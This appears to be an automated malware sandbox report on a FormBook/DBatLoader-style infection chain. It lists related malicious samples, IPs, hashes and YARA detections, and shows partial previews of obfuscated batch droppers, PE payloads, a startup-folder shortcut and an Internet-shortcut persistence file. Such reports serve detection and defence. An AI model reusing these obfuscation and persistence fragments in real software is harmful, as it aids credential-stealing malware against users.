	1.elf	Get hash	malicious	Unknown	Browse	41.61.153.3
	2.elf	Get hash	malicious	Unknown	Browse	41.185.108.111
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	41.185.133.158
	3.elf	Get hash	malicious	Unknown	Browse	41.61.164.251
	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	41.61.164.233
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	41.185.108.109
ORACLE-BMC-31898US	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	armv4l.elf	Get hash	malicious	Mirai	Browse	129.148.142.134
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	splm68k.elf	Get hash	malicious	Unknown	Browse	129.147.168.111
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1	universityform.xlsm	Get hash	malicious	Unknown	Browse	41.185.8.252
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse	41.185.8.252
	universityform.xlsm	Get hash	malicious	Unknown	Browse	41.185.8.252
	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	41.185.8.252
	lumma.ps1	Get hash	malicious	LummaC	Browse	41.185.8.252
	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse	41.185.8.252
	AquaPac.exe	Get hash	malicious	LummaC Stealer	Browse	41.185.8.252
	R3nz_Loader.exe	Get hash	malicious	LummaC	Browse	41.185.8.252
	Loader.exe	Get hash	malicious	LummaC	Browse	41.185.8.252

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\rpkhzpuO.pif	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	qDKTsL1y44.exe	Get hash	malicious	DBatLoader	Browse
	PRODUCT.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	purchaseorder.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	PO11550.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	8556
Entropy (8bit):	4.623706637784657
Encrypted:	false
SSDEEP:	192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
MD5:	60CD0BE570DECD49E4798554639A05AE
SHA1:	BD7BED69D9AB9A20B5263D74921C453F38477BCB
SHA-256:	CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
SHA-512:	AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
Malicious:	true
Preview:	@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

C:\Users\Public\Libraries\NEO.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
Category:	dropped
Size (bytes):	46543
Entropy (8bit):	4.705001079878445
Encrypted:	false
SSDEEP:	768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
MD5:	637A66953F03B084808934ED7DF7192F
SHA1:	D3AE40DFF4894972A141A631900BD3BB8C441696
SHA-256:	41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
SHA-512:	2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
Malicious:	false
Preview:	@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

C:\Users\Public\Libraries\Oupzhkpr

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	data
Category:	dropped
Size (bytes):	679957
Entropy (8bit):	7.4483963454083435
Encrypted:	false
SSDEEP:	12288:2H+NXHhlVBcqgRbPaltoM6OwLovLA/eimwQUaq3cF2ez06hNg+Ymnch:2qHX8RbyfovtLovLA/eim/ccF2ez06hO
MD5:	25A482D7B6698E7666A523C910799F13
SHA1:	18B17A1E14069E747F5076F97A9654D8D99E5ADA
SHA-256:	4C1614F48CC1998B7E1F23C15AB0F0E2F4C9356EC05FF413FC5BE98D98EC8ACB
SHA-512:	5525D32CB43E6976D8F04EB60281DC7194E8FBC05D39098FD9EBA5E0BDD50C9246A5FA8A88A601940369A97589351F848AD0AB56D6B5B97470FCDBF076572AAE
Malicious:	true
Preview:	...8...............................................................................................8...9.............8...*............................................................................................................................................................................{.."..~.......{..........!.......#...............!.......}................... .(...{.'......\|).%.... .........~.........$..\|... ..%}.~.....................#\|....{...{...........{....('..~.%....~.........}...\|...............$...................$.....\|{.$.~\|.....\|.\|.......}$..... .\|~.. ...'......$."~...#!...#........!..\|...~...\|.{....~\|...... ........}......&.........~{.........&\|... ............ ...!.......%...............}.....$..........{....\|...........~%.....\|...}...#..%.{....&.........(...{.....#!. .......\|.....#....{...........................~%.................}}.......{......\|...........).....\|.\|....%"...\|........(..FFI.S.J.<.N.

C:\Users\Public\Libraries\Oupzhkpr.PIF

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1367040
Entropy (8bit):	7.128358645065541
Encrypted:	false
SSDEEP:	24576:hdk7eYEWx0i5VTe5QCQBSt2jKasCD4LUkq0uHyC6q7KubU+7F:h0eYbSGUelb0uSC6q7bbU+p
MD5:	9B151296A899B0D58575CDE4E9563D18
SHA1:	5D329ACEE65D8CEAAC8FAB655E48B19AD954098C
SHA-256:	C23D87828FB286E90B948E20A91752F82F08F3A1B5A5F1E0AC86BC42A475F018
SHA-512:	44A820F23012942247DA685095C694906F41F4380F1085D97215E906B4563DA79D5D4C9400082F893AD30282539D341F14FD6E91C5C18856374AA639D9A286E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................,...........H.......P....@..........................p...................@..............................V+...................................................................................................................text....!.......".................. ..`.itext.......@.......&.............. ..`.data.......P...,...0..............@....bss.....7...........\...................idata..V+.......,...\..............@....tls....@................................rdata..............................@..@.reloc..............................@..B.rsrc................4..............@..@.............`......................@..@................................................................................................

C:\Users\Public\Libraries\rpkhzpuO.pif

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse Filename: qDKTsL1y44.exe, Detection: malicious, Browse Filename: PRODUCT.bat, Detection: malicious, Browse Filename: purchaseorder.bat, Detection: malicious, Browse Filename: PO11550.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\Public\Oupzhkpr.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.195196088872013
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM1N6XL3vsbxyuo/v:HRYFVmTWDyzKNafExro/v
MD5:	190C839EED3F26C7E50710FCE67CE0EC
SHA1:	A23AA8D322AB22C3917768996D464924AB5A0C1F
SHA-256:	05D7096C35666AD24E01E3BA5323F52E5C90448D589D26EC625E9A7B581A2142
SHA-512:	5822FF9A2EB4139717CEA2D03E00FA668EEB8A120C6AB02EF8C767E109EFF6871399E7901252CD8021FACCAE0C45E1E981EF877F8AB7ABE889255C464F79F1E1
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF"..IconIndex=968162..HotKey=72..

C:\Users\Public\OupzhkprF.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15789
Entropy (8bit):	4.658965888116939
Encrypted:	false
SSDEEP:	384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
MD5:	CCE3C4AEE8C122DD8C44E64BD7884D83
SHA1:	C555C812A9145E2CBC66C7C64BA754B0C7528D6D
SHA-256:	4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
SHA-512:	EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
Malicious:	false
Preview:	.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rpkhzpuO.pif.log

Download File

Process:	C:\Users\Public\Libraries\rpkhzpuO.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:lGLHyIFKL3IZ2KRH9Ougss
MD5:	C961E3496AA47D8AF3F9E184D4F78133
SHA1:	0EFEA67BD361E99BBE642D6EF414EBE7BB6EC134
SHA-256:	303E0E36CAC4900807E47B6AF8CDAB4FBFDB6A67D66F84F49E283557EA1774B1
SHA-512:	C3ECDCCF25D96C4F0C7B6407C8BAA7A0496C656C63E4757982FA1A754AF5B7902F3318F0AFE1363F365714584869A5E1E754692A84D814DD9EFDEB909A3104A3
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Microsofts.exe

Download File

Process:	C:\Users\Public\Libraries\rpkhzpuO.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	98816
Entropy (8bit):	5.666546286050177
Encrypted:	false
SSDEEP:	1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
MD5:	F6B8018A27BCDBAA35778849B586D31B
SHA1:	81BDE9535B07E103F89F6AEABDB873D7E35816C2
SHA-256:	DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
SHA-512:	AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....&..( .....s!........s"........s#........s$........s%........Z........o8...........&..(9....&........".......Vs....(B...t...........(C..."~....+."~....+."~....+."~....+."~....+.b.r...p.oa...(....(@....:.~.....o....&.:.(P....(Q......~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

Download File

Process:	C:\Users\Public\Libraries\rpkhzpuO.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	4.910353963160109
Encrypted:	false
SSDEEP:	1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
MD5:	E91A1DB64F5262A633465A0AAFF7A0B0
SHA1:	396E954077D21E94B7C20F7AFA22A76C0ED522D0
SHA-256:	F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
SHA-512:	227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejranmy5.40g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffporxxy.yoh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngf2tmdd.zv1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqqtdshb.cip.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1367040
Entropy (8bit):	7.128358645065541
Encrypted:	false
SSDEEP:	24576:hdk7eYEWx0i5VTe5QCQBSt2jKasCD4LUkq0uHyC6q7KubU+7F:h0eYbSGUelb0uSC6q7bbU+p
MD5:	9B151296A899B0D58575CDE4E9563D18
SHA1:	5D329ACEE65D8CEAAC8FAB655E48B19AD954098C
SHA-256:	C23D87828FB286E90B948E20A91752F82F08F3A1B5A5F1E0AC86BC42A475F018
SHA-512:	44A820F23012942247DA685095C694906F41F4380F1085D97215E906B4563DA79D5D4C9400082F893AD30282539D341F14FD6E91C5C18856374AA639D9A286E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................,...........H.......P....@..........................p...................@..............................V+...................................................................................................................text....!.......".................. ..`.itext.......@.......&.............. ..`.data.......P...,...0..............@....bss.....7...........\...................idata..V+.......,...\..............@....tls....@................................rdata..............................@..@.reloc..............................@..B.rsrc................4..............@..@.............`......................@..@................................................................................................

C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	665670656
Entropy (8bit):	7.9999993453564295
Encrypted:	true
SSDEEP:
MD5:	8D01E7CA64DB66A5D357A071C6E39643
SHA1:	364D01736FBB031568A71BDE8146E3D1FD5265B5
SHA-256:	0B78E23DA1460081F32F9058E009E5E1F874DD79C16B795064DAB859CD436953
SHA-512:	C0377ED66F448973AD53DF4B9AC5FF51A6722A4A0E999D2B80B04822BB511068959DA3F446D148E1023249133341C189FB12AA966D4EC4C76DB1463920490F3D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Dec 30 09:47:03 2024, mtime=Mon Dec 30 09:47:03 2024, atime=Mon Dec 30 09:47:03 2024, length=70656, window=
Category:	dropped
Size (bytes):	1784
Entropy (8bit):	3.5081498296654248
Encrypted:	false
SSDEEP:	24:8ovRD00lXUDwkPw0kSfAjVoFG9xR+O4ZvPqR0Jm:8WRD00l/kPlUWuR+ZXqRk
MD5:	200EAEED75607E88CDA168F62500CE15
SHA1:	51374CEE492228A01DF78DC494B09081C5E6AAD5
SHA-256:	C4F98DFEA3D705654EC672C5A9E0F3BF4721434AF995E901CD9E40E3E8C4F3B8
SHA-512:	C24FB9AC7A98B4CB8E11042A8A9731E243567F02DFB32EAAA444CEB08C22D9B6A8BD27AB6AABBAF053133D93F8659181C1274FC0D3E12F7771ADE1A99DD5257C
Malicious:	false
